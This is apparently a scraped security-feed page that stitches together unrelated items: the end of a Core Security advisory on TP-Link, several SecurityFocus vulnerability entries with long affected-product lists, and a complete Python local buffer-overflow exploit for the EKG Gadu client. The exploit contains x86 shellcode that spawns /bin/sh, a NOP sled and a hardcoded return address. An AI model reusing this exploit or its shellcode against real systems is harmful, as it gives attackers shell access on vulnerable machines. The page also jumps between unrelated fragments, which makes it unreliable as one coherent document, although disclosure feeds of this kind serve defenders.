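Because the advisory lists no workaround, any `v1-request` seen from a host that is not a known management station is worth investigating, and filtering UDP 1040 at the switch or host firewall removes the exposure where the platform allows it.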

8. Report Timeline

2016-10-04: Core Security sent an initial notification to TP-Link.
2016-10-07: Core Security sent a second notification to TP-Link.
2016-10-31: Core Security sent a third notification to TP-Link through Twitter.
2016-11-09: Core Security sent a fourth notification to TP-Link through email and Twitter without receiving any response whatsoever.
2016-11-10: Core Security sent a request to Mitre for two CVE IDs for this advisory.
2016-11-12: Mitre replied that the vulnerabilities did not affect products that were in scope for CVE.
2016-11-21: Advisory CORE-2016-0007 published.

9. References

[1] http://www.tplink.com/.
[2] https://www.coresecurity.com/corelabs-research/open-source-tools/impacket.

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company's strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security's analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected]

12. Disclaimer

The contents of this advisory are copyright (c) 2016 Core Security and (c) 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


Exploit Files ≈ Packet Storm

LibTIFF CVE-2016-5652 Heap Buffer Overflow Vulnerability

Bugtraq ID: 93902
Class: Boundary Condition Error
CVE: CVE-2016-5652
Remote: Yes
Local: No
Published: Oct 25 2016 12:00AM
Updated: Nov 20 2016 01:03AM
Credit: Tyler Bohan of Cisco Talos.
Vulnerable: LibTIFF LibTIFF 4.0.6
Not Vulnerable:


SecurityFocus Vulnerabilities

HDF5 CVE-2016-4332 Local Heap Overflow Vulnerability

Bugtraq ID: 94417
Class: Boundary Condition Error
CVE: CVE-2016-4332
Remote: No
Local: Yes
Published: Nov 17 2016 12:00AM
Updated: Nov 20 2016 12:12AM
Credit: Cisco Talos.
Vulnerable: HDF5 HDF5 1.8.16
Not Vulnerable:


SecurityFocus Vulnerabilities

HDF5 CVE-2016-4333 Local Heap Buffer Overflow Vulnerability

Bugtraq ID: 94416
Class: Unknown
CVE: CVE-2016-4333
Remote: No
Local: Yes
Published: Nov 17 2016 12:00AM
Updated: Nov 20 2016 12:12AM
Credit: Cisco Talos.
Vulnerable: HDF5 HDF5 1.8.16
Not Vulnerable:


SecurityFocus Vulnerabilities

Vulnerable: Oracle VM VirtualBox 5.0.26
Oracle VM VirtualBox 5.0.22
Oracle VM VirtualBox 5.0.16
Oracle VM VirtualBox 5.0.14
Oracle VM VirtualBox 5.0.13
Oracle VM VirtualBox 5.0.12
Oracle VM VirtualBox 5.0.11
Oracle VM VirtualBox 5.0.10
Oracle VM VirtualBox 5.0.9
Oracle VM VirtualBox 5.0.8
Oracle VM VirtualBox 5.0.18
Oracle VM VirtualBox 5.0
Oracle Mysql 5.7.15
Oracle Mysql 5.7.14
Oracle Mysql 5.7.13
Oracle Mysql 5.7.12
Oracle Mysql 5.7.9
Oracle Mysql 5.7.8
Oracle Mysql 5.7.7
Oracle Mysql 5.7.6
Oracle Mysql 5.7.5
Oracle Mysql 5.7.4
Oracle Mysql 5.7.3
Oracle Mysql 5.7.2
Oracle Mysql 5.6.33
Oracle Mysql 5.6.32
Oracle Mysql 5.6.31
Oracle Mysql 5.6.30
Oracle Mysql 5.6.28
Oracle Mysql 5.6.27
Oracle Mysql 5.6.26
Oracle Mysql 5.6.25
Oracle Mysql 5.6.24
Oracle Mysql 5.6.23
Oracle Mysql 5.6.22
Oracle Mysql 5.6.21
Oracle Mysql 5.6.17
Oracle Mysql 5.6.12
Oracle Mysql 5.6.11
Oracle Mysql 5.6.10
Oracle Mysql 5.6.9
Oracle Mysql 5.6.6
Oracle Mysql 5.6
Oracle Mysql 5.7.11
Oracle Mysql 5.7.10
Oracle Mysql 5.6.8
Oracle Mysql 5.6.7
Oracle Mysql 5.6.5
Oracle Mysql 5.6.4
Oracle Mysql 5.6.29
Oracle Mysql 5.6.20
Oracle Mysql 5.6.2
Oracle Mysql 5.6.19
Oracle Mysql 5.6.18
Oracle Mysql 5.6.16
Oracle Mysql 5.6.15
Oracle Mysql 5.6.14
Oracle Mysql 5.6.13
OpenSSL Project OpenSSL 1.0.0h 0
OpenSSL Project OpenSSL 0.9.8u 0
OpenSSL Project OpenSSL 1.0.11
OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0
OpenSSL Project OpenSSL 0.9.8 k
OpenSSL Project OpenSSL 0.9.8 j
OpenSSL Project OpenSSL 0.9.8 i
OpenSSL Project OpenSSL 0.9.8 h
OpenSSL Project OpenSSL 0.9.8 e
OpenSSL Project OpenSSL 0.9.8 d
OpenSSL Project OpenSSL 0.9.8 c
OpenSSL Project OpenSSL 0.9.8 b
OpenSSL Project OpenSSL 0.9.8 a
OpenSSL Project OpenSSL 0.9.8
+ Gentoo Linux
OpenSSL Project OpenSSL 0.9.7 m
OpenSSL Project OpenSSL 0.9.7 l
OpenSSL Project OpenSSL 0.9.7 k
OpenSSL Project OpenSSL 0.9.7 j
OpenSSL Project OpenSSL 0.9.7 i
OpenSSL Project OpenSSL 0.9.7 h
OpenSSL Project OpenSSL 0.9.7 g
OpenSSL Project OpenSSL 0.9.7 f
OpenSSL Project OpenSSL 0.9.7 e
OpenSSL Project OpenSSL 0.9.7 d
OpenSSL Project OpenSSL 0.9.7 c
OpenSSL Project OpenSSL 0.9.7 b
OpenSSL Project OpenSSL 0.9.7 a
+ OpenPKG OpenPKG Current
OpenSSL Project OpenSSL 0.9.7
OpenSSL Project OpenSSL 0.9.6 m
OpenSSL Project OpenSSL 0.9.6 l
OpenSSL Project OpenSSL 0.9.6 k
OpenSSL Project OpenSSL 0.9.6 j
OpenSSL Project OpenSSL 0.9.6 i
OpenSSL Project OpenSSL 0.9.6 h
OpenSSL Project OpenSSL 0.9.6 g
OpenSSL Project OpenSSL 0.9.6 f
OpenSSL Project OpenSSL 0.9.6 e
OpenSSL Project OpenSSL 0.9.6 d
+ Slackware Linux 8.1
OpenSSL Project OpenSSL 0.9.6 c
OpenSSL Project OpenSSL 0.9.6 b-36.8
OpenSSL Project OpenSSL 0.9.6 b
OpenSSL Project OpenSSL 0.9.6 a
+ NetBSD NetBSD 1.5.3
+ NetBSD NetBSD 1.5.2
+ NetBSD NetBSD 1.5.1
+ NetBSD NetBSD 1.5
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
OpenSSL Project OpenSSL 0.9.6
OpenSSL Project OpenSSL 0.9.5 a
OpenSSL Project OpenSSL 0.9.5
OpenSSL Project OpenSSL 0.9.4
OpenSSL Project OpenSSL 0.9.3
OpenSSL Project OpenSSL 0.9.2 b
OpenSSL Project OpenSSL 0.9.1 c
OpenSSL Project OpenSSL 1.0.2i
OpenSSL Project OpenSSL 1.0.2h
OpenSSL Project OpenSSL 1.0.2g
OpenSSL Project OpenSSL 1.0.2f
OpenSSL Project OpenSSL 1.0.2e
OpenSSL Project OpenSSL 1.0.2d
OpenSSL Project OpenSSL 1.0.2c
OpenSSL Project OpenSSL 1.0.2b
OpenSSL Project OpenSSL 1.0.2a
OpenSSL Project OpenSSL 1.0.1u
OpenSSL Project OpenSSL 1.0.1t
OpenSSL Project OpenSSL 1.0.1s
OpenSSL Project OpenSSL 1.0.1r
OpenSSL Project OpenSSL 1.0.1q
OpenSSL Project OpenSSL 1.0.1p
OpenSSL Project OpenSSL 1.0.1o
OpenSSL Project OpenSSL 1.0.1n
OpenSSL Project OpenSSL 1.0.1m
OpenSSL Project OpenSSL 1.0.1l
OpenSSL Project OpenSSL 1.0.1k
OpenSSL Project OpenSSL 1.0.1j
OpenSSL Project OpenSSL 1.0.1i
OpenSSL Project OpenSSL 1.0.1h
OpenSSL Project OpenSSL 1.0.1g
OpenSSL Project OpenSSL 1.0.1f
OpenSSL Project OpenSSL 1.0.1e
OpenSSL Project OpenSSL 1.0.1d
OpenSSL Project OpenSSL 1.0.1c
OpenSSL Project OpenSSL 1.0.1b
OpenSSL Project OpenSSL 1.0.1a
OpenSSL Project OpenSSL 1.0.1
OpenSSL Project OpenSSL 1.0.0x
OpenSSL Project OpenSSL 1.0.0t
OpenSSL Project OpenSSL 1.0.0s
OpenSSL Project OpenSSL 1.0.0r
OpenSSL Project OpenSSL 1.0.0q
OpenSSL Project OpenSSL 1.0.0p
OpenSSL Project OpenSSL 1.0.0o
OpenSSL Project OpenSSL 1.0.0n
OpenSSL Project OpenSSL 1.0.0m
OpenSSL Project OpenSSL 1.0.0L
OpenSSL Project OpenSSL 1.0.0k
OpenSSL Project OpenSSL 1.0.0j
OpenSSL Project OpenSSL 1.0.0i
OpenSSL Project OpenSSL 1.0.0g
OpenSSL Project OpenSSL 1.0.0f
OpenSSL Project OpenSSL 1.0.0e
OpenSSL Project OpenSSL 1.0.0d
OpenSSL Project OpenSSL 1.0.0c
OpenSSL Project OpenSSL 1.0.0b
OpenSSL Project OpenSSL 1.0.0a
OpenSSL Project OpenSSL 0.9.8zh
OpenSSL Project OpenSSL 0.9.8zg
OpenSSL Project OpenSSL 0.9.8zf
OpenSSL Project OpenSSL 0.9.8ze
OpenSSL Project OpenSSL 0.9.8zd
OpenSSL Project OpenSSL 0.9.8zc
OpenSSL Project OpenSSL 0.9.8zb
OpenSSL Project OpenSSL 0.9.8za
OpenSSL Project OpenSSL 0.9.8y
OpenSSL Project OpenSSL 0.9.8X
OpenSSL Project OpenSSL 0.9.8w
OpenSSL Project OpenSSL 0.9.8t
OpenSSL Project OpenSSL 0.9.8s
OpenSSL Project OpenSSL 0.9.8R
OpenSSL Project OpenSSL 0.9.8Q
OpenSSL Project OpenSSL 0.9.8p
OpenSSL Project OpenSSL 0.9.8o
OpenSSL Project OpenSSL 0.9.8n
OpenSSL Project OpenSSL 0.9.8m
OpenSSL Project OpenSSL 0.9.8l
OpenSSL Project OpenSSL 0.9.8g
OpenSSL Project OpenSSL 0.9.8f
OpenSSL Project OpenSSL 0.9.8.
OpenSSL Project OpenSSL 0.9.8 f
OpenSSL Project OpenSSL 0.9.8v
IBM Sterling Connect:Express for UNIX 1.5.0.9
IBM Sterling Connect:Express for UNIX 1.5.0.13
IBM Sterling Connect:Express for UNIX 1.5.0.12
IBM Sterling Connect:Express for UNIX 1.5.0.11
IBM Sterling Connect:Express for UNIX 1.5.0
IBM Sterling Connect:Express for UNIX 1.4.6
IBM Sterling Connect:Express for UNIX 1.4
IBM SDK for Node.js 6.6.0.0
IBM SDK for Node.js 6.2.0.0
IBM SDK for Node.js 6.1.0.0
IBM SDK for Node.js 6.0.0.0
IBM SDK for Node.js 4.5.0.0
IBM SDK for Node.js 4.4.6.0
IBM SDK for Node.js 4.4.5.0
IBM SDK for Node.js 4.4.4.0
IBM SDK for Node.js 4.4.3.0
IBM SDK for Node.js 4.4.2.0
IBM SDK for Node.js 4.4.1.0
IBM SDK for Node.js 4.4.0.0
IBM SDK for Node.js 4.3.2.0
IBM SDK for Node.js 4.3.1.0
IBM SDK for Node.js 1.2.0.9
IBM SDK for Node.js 1.2.0.8
IBM SDK for Node.js 1.2.0.4
IBM SDK for Node.js 1.2.0.3
IBM SDK for Node.js 1.2.0.2
IBM SDK for Node.js 1.2.0.14
IBM SDK for Node.js 1.2.0.13
IBM SDK for Node.js 1.2.0.12
IBM SDK for Node.js 1.2.0.11
IBM SDK for Node.js 1.2.0.10
IBM SDK for Node.js 1.2.0.1
IBM SDK for Node.js 1.1.1.3
IBM SDK for Node.js 1.1.1.2
IBM SDK for Node.js 1.1.1.1
IBM SDK for Node.js 1.1.1.0
IBM SDK for Node.js 1.1.0.9
IBM SDK for Node.js 1.1.0.7
IBM SDK for Node.js 1.1.0.6
IBM SDK for Node.js 1.1.0.5
IBM SDK for Node.js 1.1.0.3
IBM SDK for Node.js 1.1.0.21
IBM SDK for Node.js 1.1.0.20
IBM SDK for Node.js 1.1.0.2
IBM SDK for Node.js 1.1.0.19
IBM SDK for Node.js 1.1.0.18
IBM SDK for Node.js 1.1.0.15
IBM SDK for Node.js 1.1.0.14
IBM SDK for Node.js 1.1.0.13
IBM SDK for Node.js 1.1.0.12
IBM SDK for Node.js 1.1
IBM Rational Application Developer for WebSphere Software 9.5
IBM Rational Application Developer for WebSphere Software 9.1
IBM i 7.3
IBM i 7.2
IBM i 7.1
Cisco Wide Area Application Services (WAAS) 0
Cisco WebEx Node for MCS 0
Cisco WebEx Meetings Server - Multimedia Platform (MMP) 0
Cisco WebEx Meetings Server 2.0
Cisco WebEx Meetings Server 1.0
Cisco WebEx Meetings for Windows Phone 8 0
Cisco WebEx Meetings for BlackBerry 0
Cisco WebEx Meetings for Android 0
Cisco WebEx Meetings Client - On-Premises 0
Cisco WebEx Meetings Client - Hosted 0
Cisco WebEx Meeting Center 0
Cisco WebEx Business Suite 0
Cisco Web Security Appliance (WSA) 0
Cisco Visual Quality Experience Tools Server 0
Cisco Visual Quality Experience Server 0
Cisco Virtualization Experience Media Edition 0
Cisco Virtual Security Gateway 0
Cisco Videoscape Control Suite 0
Cisco Videoscape AnyRes Live 0
Cisco Video Surveillance PTZ IP Cameras 0
Cisco Video Surveillance Media Server 0
Cisco Video Surveillance 7000 Series IP Cameras 0
Cisco Video Surveillance 6000 Series IP Cameras 0
Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras 0
Cisco Video Surveillance 4000 Series High-Definition IP Cameras 0
Cisco Video Surveillance 3000 Series IP Cameras 0
Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) 0
Cisco Universal Small Cell Iuh 0
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 2.99.4
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 0
Cisco Universal Small Cell 7000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 0
Cisco Unity Express 0
Cisco Unity Connection 0
Cisco Unified Workforce Optimization - Quality Management Solution 0
Cisco Unified Workforce Optimization 0
Cisco Unified SIP Proxy Software 0
Cisco Unified MeetingPlace 0
Cisco Unified IP 9971 Phone 0
Cisco Unified IP 9951 Phone 0
Cisco Unified IP 8961 Phone 0
Cisco Unified IP 8945 Phone 0
Cisco Unified IP 8831 Conference Phone for Third-Party Call Control 0
Cisco Unified IP 8831 Conference Phone 0
Cisco Unified IP 7900 Series Phones 0
Cisco Unified IP 6945 Phone 0
Cisco Unified IP 6901 Phone 0
Cisco Unified Intelligent Contact Management Enterprise 0
Cisco Unified Intelligence Center 0
Cisco Unified Contact Center Express 0
Cisco Unified Contact Center Enterprise 0
Cisco Unified Communications Manager Session Management Edition 0
Cisco Unified Communications Manager IM & Presence Service (formerly C 0
Cisco Unified Communications Manager (CUCM) 0
Cisco Unified Communications Domain Manager 0
Cisco Unified Attendant Console Premium Edition 0
Cisco Unified Attendant Console Enterprise Edition 0
Cisco Unified Attendant Console Department Edition 0
Cisco Unified Attendant Console Business Edition 0
Cisco Unified Attendant Console Advanced 0
Cisco UCS Standalone C-Series Rack Server - Integrated Management Cont 0
Cisco UCS Manager 0
Cisco UCS Director 0
Cisco UCS Central Software 0
Cisco UCS B-Series Blade Servers 0
Cisco UCS 6200 Series and 6300 Series Fabric Interconnects 0
Cisco UC Integration for Microsoft Lync 0
Cisco TelePresence Video Communication Server (VCS) 0
Cisco TelePresence TX9000 Series 0
Cisco TelePresence System TX1310 0
Cisco TelePresence System EX Series 0
Cisco TelePresence System 500-37 0
Cisco TelePresence System 500-32 0
Cisco TelePresence System 3000 Series 0
Cisco TelePresence System 1300 0
Cisco TelePresence System 1100 0
Cisco TelePresence System 1000 0
Cisco TelePresence SX Series 0
Cisco TelePresence Supervisor MSE 8050 0
Cisco TelePresence Server on Virtual Machine 0
Cisco TelePresence Server on Multiparty Media 820 0
Cisco TelePresence Server on Multiparty Media 310 and 320 0
Cisco TelePresence Server 7010 and MSE 8710 0
Cisco TelePresence Serial Gateway Series 0
Cisco TelePresence Profile Series 0
Cisco TelePresence MX Series 0
Cisco TelePresence MCU 0
Cisco TelePresence ISDN Link 0
Cisco TelePresence ISDN Gateway MSE 8321 0
Cisco TelePresence ISDN Gateway 3241 0
Cisco TelePresence Integrator C Series 0
Cisco TelePresence Content Server 0
Cisco TelePresence Conductor 0
Cisco TAPI Service Provider (TSP) 0
Cisco Tandberg Codian MSE 8320 0
Cisco Tandberg Codian ISDN Gateway 0
Cisco StealthWatch UDP Director 0
Cisco StealthWatch Management Console (SMC) 0
Cisco StealthWatch IDentity 0
Cisco StealthWatch FlowCollector sFlow 0
Cisco StealthWatch FlowCollector NetFlow 0
Cisco SPA525G 5-Line IP Phone 0
Cisco SPA232D Multi-Line DECT Analog Telephone Adapter (ATA) 0
Cisco SPA122 Analog Telephone Adapter (ATA) with Router 0
Cisco SPA112 2-Port Phone Adapter 0
Cisco SocialMiner 0
Cisco Smart Net Total Care - Local Collector appliance 0
Cisco Smart Care 0
Cisco Small Business 300 Series (Sx300) Managed Switches 0
Cisco Show and Share 0
Cisco Services Provisioning Platform 0
Cisco Security Manager 0
Cisco Secure Access Control System (ACS) 0
Cisco Registered Envelope Service 0
Cisco Proactive Network Operations Center 0
Cisco Prime Performance Manager 0
Cisco Prime Optical for Service Providers 0
Cisco Prime Network Services Controller 0
Cisco Prime Network 0
Cisco Prime License Manager 0
Cisco Prime IP Express 0
Cisco Prime Infrastructure Plug and Play Standalone Gateway 0
Cisco Prime Data Center Network Manager -
Cisco Prime Collaboration Provisioning 0
Cisco Prime Collaboration Deployment 0
Cisco Prime Collaboration Assurance 0
Cisco Prime Access Registrar 0
Cisco Partner Support Service 1.0
Cisco Paging Server (Informacast) 0
Cisco Paging Server 0
Cisco Packaged Contact Center Enterprise 0
Cisco ONS 15454 Series Multiservice Provisioning Platforms 0
Cisco onePK All-in-One Virtual Machine 0
Cisco Nexus 9000 Series Switches - Standalone NX-OS mode 0
Cisco Nexus 9000 Series Fabric Switches - ACI mode 0
Cisco Nexus 7000 Series Switches 0
Cisco Nexus 6000 Series Switches 0
Cisco Nexus 5000 Series Switches 0
Cisco Nexus 4000 Series Blade Switches 0
Cisco Nexus 1000V Series Switches 0
Cisco Network Performance Analysis 0
Cisco Network Analysis Module 0
Cisco NetFlow Generation Appliance 0
Cisco NAC Guest Server 0
Cisco NAC Appliance - Clean Access Server 0
Cisco NAC Appliance - Clean Access Manager 0
Cisco MXE 3500 Series Media Experience Engines 0
Cisco Multicast Manager 0
Cisco MediaSense 0
Cisco Media Services Interface 0
Cisco MDS 9000 Series Multilayer Switches 0
Cisco Management Appliance 0
Cisco Jabber Software Development Kit 0
Cisco Jabber Guest 0
Cisco Jabber for Windows 0
Cisco Jabber for Mac 0
Cisco Jabber for iPhone and iPad 0
Cisco Jabber for Android 0
Cisco Jabber Client Framework (JCF) Components 0
Cisco IP Interoperability and Collaboration System (IPICS) 0
Cisco IP 8800 Series Phones - VPN feature 0
Cisco IP 7800 Series Phones 0
Cisco Intrusion Prevention System (IPS) Solutions 0
Cisco InTracer 0
Cisco Hosted Collaboration Mediation Fulfillment 0
Cisco FireSIGHT System Software 0
Cisco Expressway series 0
Cisco Enterprise Content Delivery System (ECDS) 0
Cisco Emergency Responder 0
Cisco Email Security Appliance (ESA) 0
Cisco Edge 340 Digital Media Player 0
Cisco Edge 300 Digital Media Player 0
Cisco DX Series IP Phones 0
Cisco Content Security Management Appliance (SMA) 0
Cisco Content Security Appliance Update Servers 0
Cisco Connected Grid Routers 0
Cisco Computer Telephony Integration Object Server (CTIOS) 0
Cisco Common Services Platform Collector 0
Cisco Cloupia Unified Infrastructure Controller 0
Cisco Cloud Web Security 0
Cisco Cloud Object Storage 0
Cisco Clean Access Manager 0
Cisco ATA 190 Series Analog Terminal Adaptors 0
Cisco ATA 187 Analog Telephone Adaptor 0
Cisco ASR 5000 Series 0
Cisco ASA Next-Generation Firewall Services 0
Cisco Application Policy Infrastructure Controller (APIC) 0
Cisco Application and Content Networking System (ACNS) 0
Cisco AnyConnect Secure Mobility Client for Windows 0
Cisco AnyConnect Secure Mobility Client for Mac OS X 0
Cisco AnyConnect Secure Mobility Client for Linux 0
Cisco AnyConnect Secure Mobility Client for iOS 0
Cisco AnyConnect Secure Mobility Client for desktop platforms 0
Cisco AnyConnect Secure Mobility Client for Android 0
Cisco Aironet 2700 Series Access Points 0
Cisco Agent for OpenFlow 0
Cisco Agent Desktop for Cisco Unified Contact Center Express 0
Cisco Adaptive Security Appliance (ASA) 0
Cisco ACE30 Application Control Engine Module 0
Cisco ACE 4710 Application Control Engine 0
Cisco 910 Industrial Router 0
Cisco 500 Series Stackable (Sx500) Managed Switches 0
Cisco 4400 Series Digital Media Players 0
Cisco 4300 Series Digital Media Players 0
Cisco 220 Series Smart Plus (Sx220) Switches 0
Bluecoat PolicyCenter 9.2
Bluecoat PacketShaper 9.2
Bluecoat Malware Analysis Appliance 4.2
Bluecoat Director 6.1


SecurityFocus Vulnerabilities

CVE: CVE-2016-7519
CVE-2016-7520
CVE-2016-7521
CVE-2016-7522
CVE-2016-7523
CVE-2016-7524
CVE-2016-7525
CVE-2016-7526
CVE-2016-7529
CVE-2016-7530
CVE-2016-7531
CVE-2016-7532
CVE-2016-7533
CVE-2016-7534
CVE-2016-7535
CVE-2016-7537
CVE-2016-7538


SecurityFocus Vulnerabilities

# Exploit developed using Exploit Pack v6.01
# Exploit Author: Juan Sacco - http://www.exploitpack.com
# Program affected: EKG Gadu
# Affected value: USERNAME
# Version: 1:1.9~pre+r2855-3+b1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: console Gadu Gadu client for UNIX systems - ncurses UI
# EKG ("Eksperymentalny Klient Gadu-Gadu") is an open source
# Gadu-Gadu client for UNIX systems.
# Kali Linux 2.0 package: pool/main/e/ekg/ekg_1.9~pre+r2855-3+b1_i386.deb
# MD5sum: c752577dfb5ea44513a3fb351d431afa
# Website: http://ekg.chmurka.net/
#
# gdb$ run `python -c 'print "A"*258'`
# 0x0807e125 in strlcpy ()
# gdb$ backtrace
# #0 0x0807e125 in strlcpy ()
# #1 0x080570bb in ioctld_socket ()
# #2 0x08052e60 in main ()

import os, subprocess

def run():
    try:
        print "# EKG Gadu - Local Buffer Overflow by Juan Sacco"
        print "# This Exploit has been developed using Exploit Pack - http://exploitpack.com"
        # NOPSLED + SHELLCODE + EIP

        buffersize = 240
        nopsled = "\x90"*30
        shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
        eip = "\x20\xf1\xff\xbf"
        buffer = nopsled * (buffersize-len(shellcode)) + eip
        subprocess.call(["ekg ",' ', buffer])

    except OSError as e:
        if e.errno == os.errno.ENOENT:
            print "Sorry, EKG Gadu - Not found!"
        else:
            print "Error executing exploit"
        raise

def howtousage():
    print "Snap! Something went wrong"
    sys.exit(-1)

if __name__ == '__main__':
    try:
        print "Exploit EKG Gadu - Local Overflow Exploit"
        print "Author: Juan Sacco - Exploit Pack"
    except IndexError:
        howtousage()
    run()


Exploit Files ≈ Packet Storm

Bugtraq ID: 92962
Class: Boundary Condition Error
CVE: CVE-2016-8276
Remote: Yes
Local: No
Published: Sep 14 2016 12:00AM
Updated: Sep 19 2016 02:00PM
Credit: The vendor reported this issue.
Vulnerable: Huawei USG5500 V300R001C10
Huawei USG5500 V300R001C00
Huawei USG5100 V300R001C10
Huawei USG5100 V300R001C00
Huawei USG2200 V300R001C10
Huawei USG2200 V300R001C00
Huawei USG2100 V300R001C10
Huawei USG2100 V300R001C00
Not Vulnerable: Huawei USG5500 V300R001C10SPC600
Huawei USG5100 V300R001C10SPC600
Huawei USG2200 V300R001C10SPC600
Huawei USG2100 V300R001C10SPC600


SecurityFocus Vulnerabilities